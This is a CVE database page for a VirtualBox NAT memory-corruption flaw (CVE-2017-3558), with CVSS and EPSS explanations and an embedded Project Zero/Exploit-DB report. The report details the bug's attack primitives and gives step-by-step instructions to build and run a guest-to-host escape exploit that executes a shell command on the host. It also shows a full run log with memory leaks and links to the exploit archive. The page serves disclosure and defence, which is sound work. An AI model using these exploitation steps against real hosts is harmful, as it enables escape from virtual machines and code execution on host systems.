CVE-2017-3558 : Detail

CVE-2017-3558

8.5
/
High
0.15%V3
Local
2017-04-24
17h00 +00:00
2024-10-07
16h11 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.0.38 and Prior to 5.1.20. Easily "exploitable" vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data and unauthorized read access to a subset of Oracle VM VirtualBox accessible data. CVSS 3.0 Base Score 8.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H).

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.

Metrics

Metrics Score Severity CVSS Vector Source
V3.0 8.5 HIGH CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

A vulnerability exploitable with Local access means that the vulnerable component is not bound to the network stack, and the attacker's path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file.

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Changed

An exploited vulnerability can affect resources beyond the authorization privileges intended by the vulnerable component. In this case the vulnerable component and the impacted component are different.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

Low

There is some loss of confidentiality. Access to some restricted information is obtained, but the attacker does not have control over what information is obtained, or the amount or kind of loss is constrained. The information disclosure does not cause a direct, serious loss to the impacted component.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

Low

Modification of data is possible, but the attacker does not have control over the consequence of a modification, or the amount of modification is constrained. The data modification does not have a direct, serious impact on the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

 [email protected]
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 41904

Publication date : 2017-04-19 22h00 +00:00
Author : Google Security Research
EDB Verified : Yes

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1086 There is a vulnerability in VirtualBox that permits an attacker with root privileges in a virtual machine with a NAT network interface to corrupt the memory of the userspace host process and leak memory contents from the userspace host process. This probably permits an attacker with root privileges inside the guest to execute arbitrary code in userspace context on the host. The issue is in the copy of slirp that is shipped in VirtualBox, in the function ip_input() in src/VBox/Devices/Network/slirp/ip_input.c: void ip_input(PNATState pData, struct mbuf *m) { register struct ip *ip; [...] ip = mtod(m, struct ip *); [...] { [...] /* * XXX: TODO: this is most likely a leftover spooky action at * a distance from alias_dns.c host resolver code and can be * g/c'ed. */ if (m->m_len != RT_N2H_U16(ip->ip_len)) m->m_len = RT_N2H_U16(ip->ip_len); } [...] } This code does not seem to be present in the upstream version of slirp. The assignment `m->m_len = RT_N2H_U16(ip->ip_len)` overwrites the trusted length field `m_len` of the buffer `m` with the untrusted length field in the IP header of the received packet. At this point, the IP header has not been validated at all. All following code that processes packets relies on the correctness of `m->m_len`, so by sending an IP header with a bogus length field, an attacker can cause all following code to operate on out-of-bounds data. In particular, an attacker can use this bug to obtain the following attack primitives: - The attacker can leak out-of-bounds heap data by sending a UDP packet to a host on the internet with checksum 0 and a bogus length field in the IP header. The host process will send a (possibly fragmented) UDP packet to the specified host on the internet that includes out-of-bounds heap data. This method requires a cooperating host on the internet that the VM can talk to using the NAT network interface. - The attacker can leak out-of-bounds heap data by sending an ICMP Echo Request with a bogus length field in the IP header to the CTL_DNS address. The VM host then responds with an ICMP Echo Reply that includes out-of-bounds heap data. This approach has the advantage of not requiring a cooperating, reachable server on the internet, but has the disadvantage that the attacker needs to guess the 16-bit ICMP checksum. - The attacker can corrupt the heap by sending a UDP packet with a bogus length whose IP header contains IP options. The host process will then attempt to strip the IP headers via ip_input -> udp_input -> ip_stripoptions -> memcpy, which moves the IP payload - including out-of-bounds heap data - to a lower address. This can in particular be abused to overwrite a slirp heap chunk header (struct item) with attacker-controlled packet data. I have attached a crash PoC. Copy it into a VM whose only network interface is a NAT interface, compile it with "gcc -o crasher crasher.c" and run it with "sudo ./crasher". The VM should die after a few seconds, with something like this appearing in dmesg on the host: [107463.674598] traps: EMT-0[66638] general protection ip:7fc6a26076e8 sp:7fc6d2e27ad0 error:0 in VBoxDD.so[7fc6a24e2000+36d000] I have tested my crasher in VirtualBox version "5.1.14 r112924". The bug was introduced in SVN revision <https://www.virtualbox.org/changeset/23155/vbox>. ################################################################################ Without modifications, the exploit should work under the following conditions: - host runs Ubuntu 14.04 (trusty), 64-bit - host uses libc6 package version 2.19-0ubuntu6.9 (most recent version) - VirtualBox version is 5.1.14~112924~Ubuntu~trusty (official build) (most recent version) - guest runs Linux - main network interface of the VM is a NAT interface (default config) The exploit is able to run an arbitrary shell command on the host system. The command is hardcoded to "id > /tmp/owned_from_guest". Some things about the exploit that might be of interest to you: The exploit operates on memory that belongs to the zone zone_clust of the UMA heap. The UMA heap is relatively easy to attack, partly because the sanity checks are compiled out in userland code in release builds. For example, the check `Assert((zone->magic == ZONE_MAGIC && zone == it->zone))` in uma_zfree_arg() becomes a no-op, and the LIST_CHECKs in LIST_REMOVE() have no effect. In particular, because the `zone == it->zone` assertion is not compiled into release builds, an attacker who can overwrite an item header and point its member ->zone to a controlled memory area can cause an arbitrary function it->zone->pfFini to be called when the item whose header was overwritten is freed. It might make sense to turn assertions in the allocator into something that is also active in release builds. For exploiting the bug, it was very helpful that the VirtualBox binary is built as non-relocatable, meaning that the binary is always loaded at the same virtual address. The exploit uses a hardcoded address to leak the contents of the GOT (global offset table), which can then be used to locate the addresses of libc functions. It's probably a good idea to build the VirtualBox binaries as relocatable code to prevent attacks from simply using hardcoded addresses - and this mitigation is pretty simple to implement, you just have to add some compiler flags (`-pie -fPIE` or so). To verify that it's working, run VirtualBox, then as root, grep the contents of /proc/{pid of VirtualBox}/maps for VirtualBox and verify that the mappings don't have low ranges like 00400000-00408000, but use high addresses like 7ffb0f62e000 instead. As far as I can tell from the source, on a Linux or Mac host, an attacker who has compromised the VM host process can also run arbitrary code in the host kernel using the ioctls SUP_IOCTL_LDR_OPEN and SUP_IOCTL_LDR_LOAD. If that is indeed the case, it might make sense to reduce the privileges of the userland host code by sandboxing components like the shared folder host and the NAT implementation and/or by rearchitecting VirtualBox so that the host kernel doesn't trust the host userland binary. To reproduce the bug with the attached exploit: - On the host or some other box on the internet, compile and run the helper: $ gcc -o helper helper.c -Wall $ ./helper - In the guest, compile the exploit: # gcc -o bcs bcs.c -Wall -std=gnu99 (This may throw some harmless format string warnings depending on whether the guest is 64-bit.) - To improve reliability, ensure that the guest isn't running any network services or clients, save the guest VM and restore it. (Saving and restoring the guest resets the Slirp heap.) - In the guest, as root, run the exploit. Pass the helper host's IP address as argument. # ./bcs xxx.xxx.xxx.xxx - If the exploit was successful, there should be a new file "/tmp/owned_from_guest" on the host that contains the output of the "id" command. A successful run of the exploit should look like this: ================================================================== # ./bcs {censored} systemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* dev \([^ ]*\) .*|\1|' | tr -d '\n'>>> enp0s3 ================================ systemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* src \([^ ]*\) .*|\1|' | tr -d '\n'>>> 10.0.2.15 ================================ systemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* via \([^ ]*\) .*|\1|' | tr -d '\n'>>> 10.0.2.2 ================================ systemf: <<<ping -c3 -w4 10.0.2.2>>> PING 10.0.2.2 (10.0.2.2) 56(84) bytes of data. 64 bytes from 10.0.2.2: icmp_seq=2 ttl=64 time=0.375 ms 64 bytes from 10.0.2.2: icmp_seq=3 ttl=64 time=0.277 ms 64 bytes from 10.0.2.2: icmp_seq=4 ttl=64 time=0.297 ms --- 10.0.2.2 ping statistics --- 4 packets transmitted, 3 received, 25% packet loss, time 3054ms rtt min/avg/max/mdev = 0.277/0.316/0.375/0.044 ms ================================ systemf: <<<arp -s 10.0.2.2 01:23:45:67:89:ab>>> systemf: <<<iptables -I OUTPUT -o enp0s3 -j DROP>>> defragging... defragged trying to leak... got UDP, len=68 leak_udp successful got data 00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...| 00000010 01 00 00 00 00 00 00 00 58 3e 26 35 56 7f 00 00 |........X>&5V...| 00000020 18 2e 26 35 56 7f 00 00 |..&5V...| 00000028 magic: 0xdead0001 zone: 0x7f5648b4e600 refcount: 0x1 next: 0x7f5635263e58 prev: 0x7f5635262e00 defragging... defragged placed shell command at 0x7f5635263676 freelist head at 0x7f5648b4e690 trying to leak... got UDP, len=68 leak_udp successful got data 00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...| 00000010 01 00 00 00 00 00 00 00 a0 ec 25 35 56 7f 00 00 |..........%5V...| 00000020 60 dc 25 35 56 7f 00 00 |`.%5V...| 00000028 magic: 0xdead0001 zone: 0x7f5648b4e600 refcount: 0x1 next: 0x7f563525eca0 prev: 0x7f563525dc48 defragging... defragged fake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525fd42, fake_zone at 0x7f563525fd4a fake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525f516, fake_zone at 0x7f563525f51e fake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525ecea, fake_zone at 0x7f563525ecf2 fake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525e4be, fake_zone at 0x7f563525e4c6 send_udp_datashift(shift_amount=40, data_length=9368) send_udp_datashift(shift_amount=36, data_length=9368) sending packet2, ip_off=0x28, ip_id=0x1a trying to leak GOT from fake chunk... got UDP, len=540 leak_udp successful 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000200 defragging... defragged got UDP, len=540 leak_udp successful 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000010 b0 09 c0 97 56 7f 00 00 b6 0f 40 00 00 00 00 00 |....V.....@.....| 00000020 10 9d c3 97 56 7f 00 00 a0 a0 c3 97 56 7f 00 00 |....V.......V...| 00000030 e6 0f 40 00 00 00 00 00 90 28 c7 97 56 7f 00 00 |..@......(..V...| 00000040 20 9d c3 97 56 7f 00 00 e0 03 15 98 56 7f 00 00 | ...V.......V...| 00000050 26 10 40 00 00 00 00 00 36 10 40 00 00 00 00 00 |&[email protected].@.....| 00000060 50 9e b9 97 56 7f 00 00 56 10 40 00 00 00 00 00 |P...V...V.@.....| 00000070 80 30 c6 97 56 7f 00 00 10 fc c0 97 56 7f 00 00 |.0..V.......V...| 00000080 86 10 40 00 00 00 00 00 96 10 40 00 00 00 00 00 |..@.......@.....| 00000090 c0 fe c0 97 56 7f 00 00 80 2c c7 97 56 7f 00 00 |....V....,..V...| 000000a0 d0 9f c3 97 56 7f 00 00 30 9d c3 97 56 7f 00 00 |....V...0...V...| 000000b0 60 28 c7 97 56 7f 00 00 90 e0 f3 97 56 7f 00 00 |`(..V.......V...| 000000c0 70 c8 c6 97 56 7f 00 00 16 11 40 00 00 00 00 00 |p...V.....@.....| 000000d0 30 0c c8 97 56 7f 00 00 a0 c8 c6 97 56 7f 00 00 |0...V.......V...| 000000e0 60 c9 c6 97 56 7f 00 00 d0 0b 15 98 56 7f 00 00 |`...V.......V...| 000000f0 66 11 40 00 00 00 00 00 76 11 40 00 00 00 00 00 |[email protected].@.....| 00000100 86 11 40 00 00 00 00 00 96 11 40 00 00 00 00 00 |..@.......@.....| 00000110 50 e1 f3 97 56 7f 00 00 b6 11 40 00 00 00 00 00 |P...V.....@.....| 00000120 c6 11 40 00 00 00 00 00 00 00 00 00 00 00 00 00 |..@.............| 00000130 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 |................| 00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000160 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 |................| 00000170 00 00 00 00 22 05 08 20 00 20 00 00 88 13 00 00 |....".. . ......| 00000180 81 cb 05 00 02 00 00 00 b9 4b 40 00 00 00 00 00 |.........K@.....| 00000190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001a0 00 00 00 00 00 00 00 00 2f 75 73 72 2f 6c 69 62 |......../usr/lib| 000001b0 2f 76 69 72 74 75 61 6c 62 6f 78 00 56 69 72 74 |/virtualbox.Virt| 000001c0 75 61 6c 42 6f 78 00 00 00 00 00 00 00 00 00 00 |ualBox..........| 000001d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000200 strlen at 0x7f5697c009b0 system() at 0x7f5697bbe590 calling system()... defragging... defragged trying to leak... got UDP, len=68 leak_udp successful got data 00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...| 00000010 01 00 00 00 00 00 00 00 84 cd 0f 35 56 7f 00 00 |...........5V...| 00000020 44 bd 0f 35 56 7f 00 00 |D..5V...| 00000028 magic: 0xdead0001 zone: 0x7f5648b4e600 refcount: 0x1 next: 0x7f56350fcd84 prev: 0x7f56350fbd2c defragging... defragged fake zone packet item at 0x7f56350fc558, dummy_next at 0x7f56350fc5a2, fake_zone at 0x7f56350fc5aa send_udp_datashift(shift_amount=40, data_length=3092) send_udp_datashift(shift_amount=36, data_length=3092) sending packet2, ip_off=0xa, ip_id=0x27 did that work? systemf: <<<iptables -D OUTPUT -o enp0s3 -j DROP>>> ================================================================== If the exploit crashes, you'll have to remove the firewall rule the exploit added with `iptables -D OUTPUT -o {interface} -j DROP` inside the VM to restore network connectivity. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41904.zip

Products Mentioned

Configuraton 0

Oracle>>Vm_virtualbox >> Version From (including) 5.0.0 To (excluding) 5.0.38

Oracle>>Vm_virtualbox >> Version From (including) 5.1.0 To (excluding) 5.1.20

References

http://www.securitytracker.com/id/1038288
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/97744
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/41904/
Tags : exploit, x_refsource_EXPLOIT-DB